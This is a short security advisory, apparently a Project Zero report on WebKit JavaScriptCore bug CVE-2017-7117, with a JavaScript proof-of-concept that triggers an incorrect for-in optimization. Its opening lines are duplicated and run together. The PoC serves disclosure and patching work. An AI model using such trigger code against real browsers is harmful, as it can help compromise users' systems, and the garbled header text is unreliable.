WebKit: JSC: Incorrect for-in optimization #2

CVE-2017-7117


The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 We WebKit: JSC: Incorrect for-in optimization #2

CVE-2017-7117


The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal

PoC:
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {

}

print(o[i]);
}
}

f();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt